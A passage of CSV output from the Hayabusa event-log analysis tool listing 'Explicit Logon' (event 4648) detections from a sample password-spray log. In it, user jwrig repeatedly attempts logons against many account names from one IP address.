+09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:15.846 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:16.940 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:18.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:19.076 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:20.162 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:21.257 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:22.327 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:23.410 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:24.477 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:25.557 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:26.628 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:27.690 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:28.763 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:29.837 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:30.921 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:31.996 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:33.058 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:34.138 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:35.199 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:36.266 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:37.375 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:38.439 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:39.499 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:40.560 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:41.637 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:42.734 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:43.795 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:44.875 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:45.951 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:47.017 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:48.096 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:49.176 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:50.264 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:51.340 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:52.405 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:53.466 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:54.572 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:55.671 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:56.741 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:57.817 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:58.894 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:59.965 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:01.026 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:02.115 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:03.191 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:04.272 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:05.348 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:06.426 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:07.478 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:08.564 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:09.668 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:10.717 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:11.809 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:12.857 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:13.904 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:14.972 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:16.050 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:17.129 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:18.186 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:19.254 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:20.329 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:21.401 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:22.487 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:23.577 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:24.660 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:25.732 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:26.794 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:27.863 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:28.925 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:29.993 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:31.050 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:32.142 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:33.206 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:34.265 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:35.340 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:36.403 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:37.453 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:38.533 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:39.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:40.691 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:41.769 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:42.852 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:43.922 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:44.998 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:46.080 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:47.159 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:48.237 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit 